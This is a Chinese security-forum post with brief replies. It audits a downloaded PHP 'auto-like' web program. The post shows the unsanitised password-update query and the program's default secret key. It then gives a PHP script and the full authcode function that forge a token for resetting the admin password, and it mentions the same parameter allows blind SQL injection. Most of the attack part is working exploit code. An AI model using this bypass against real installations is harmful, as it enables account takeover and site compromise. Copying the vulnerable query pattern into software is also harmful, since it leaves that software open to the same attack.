[红客焦点]对某php秒赞程序的一次代码审计

Free_小东

很久没在论坛发过文章了，也不知道写点什么。深知自己的不足，所以自己也是一直不断在努力的学习。朋友要搞一个平台，源码是网上下的，叫我看下源码安全性怎么样。自己一直在学习研究代  码审计。于是就在某牛的指导下摸索的看了下这套小众程序。大牛轻喷

先用seay的神器整体看下

看看quanz.php

没有什么卵用，利用不了。继续看

找到/setp.php：26行

[PHP] 纯文本查看 复制代码

if($db->query("update ".C('DB_PREFIX')."users set pwd='$pwd' where user='$user' "))

溯源，往上看，跟踪 $user

[PHP] 纯文本查看 复制代码

$code=authcode(base64_decode($_GET['code']),'DECODE',$syskey);
$arr=explode('||||',$code);
$user=$arr[0];

没有对参数进行任何的处理，直接就入库了。

这段代码的意思呢，就是通过get方式传入code参数，再将参数用base64解密，然后再将解密后的密文通过authcode这个函数再次解密，然后进入下面的流程。

Authcode这个函数是dz的，这里只是照搬过来。具体用法参照百度，这里不再赘述

由于要用到$syskey，所以我们看看上面包含的cons.php 这个文件

Key默认是不会改变的。只要key不变，就能利用

知道解密方式，反过来写出加密过程。

加密代码如下：

[PHP] 纯文本查看 复制代码

<?php
include_once "functions.php";
$syskey='Kl3RsQspczEsK1';
$keycode=$_GET['c'];
$m_codes = base64_encode(authcode($keycode.'||||'.time(),'ENCODE',$syskey));
echo $m_codes;
?>

Functions.php部分参考  直接搬过来的

        

[PHP] 纯文本查看 复制代码

<?php
        function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
        $ckey_length = 4;
        $key = md5($key ? $key : ENCRYPT_KEY);
        $keya = md5(substr($key, 0, 16));
        $keyb = md5(substr($key, 16, 16));
        $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
        $cryptkey = $keya.md5($keya.$keyc);
        $key_length = strlen($cryptkey);
        $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
        $string_length = strlen($string);
        $result = '';
        $box = range(0, 255);
        $rndkey = array();
        for($i = 0; $i <= 255; $i++) {
                $rndkey[$i] = ord($cryptkey[$i % $key_length]);
        }
        for($j = $i = 0; $i < 256; $i++) {
                $j = ($j + $box[$i] + $rndkey[$i]) % 256;
                $tmp = $box[$i];
                $box[$i] = $box[$j];
                $box[$j] = $tmp;
        }
        for($a = $j = $i = 0; $i < $string_length; $i++) {
                $a = ($a + 1) % 256;
                $j = ($j + $box[$a]) % 256;
                $tmp = $box[$a];
                $box[$a] = $box[$j];
                $box[$j] = $tmp;
                $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
        }
        if($operation == 'DECODE') {
                if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
                        return substr($result, 26);
                } else {
                        return '';
                }
        } else {
                return $keyc.str_replace('=', '', base64_encode($result));
        }
}
?>

通过该代码我们逆向出admin的密文

成功绕过验证 直接修改admin的密码就可以了

另外这个参数还可以用来盲注，写个脚本跑就可以了。在这里由于已拿到后台就不做陈述

wang

膜拜大神

浮尘

膜拜

小圈圈

过了没？@90

clocks

温馨提醒！所有投稿文章，，不能有任何的“灌水现象”。。所以除技术性回复，其他的 谢谢分享！膜拜！中国红客！http://www.ihonker.org/！  等等 无意义回复统统扣分警告！

浮尘

clocks 发表于 2016-1-21 12:57
温馨提醒！所有投稿文章，，不能有任何的“灌水现象”。。所以除技术性回复，其他的 谢谢分享！膜拜！中国 ...

啥时候说的，我咋不知道

clocks

浮尘 发表于 2016-1-21 13:16
啥时候说的，我咋不知道

不是他们说的是我说的！技术投稿就要突出技术性。

wuyan

东哥

williams

学习学习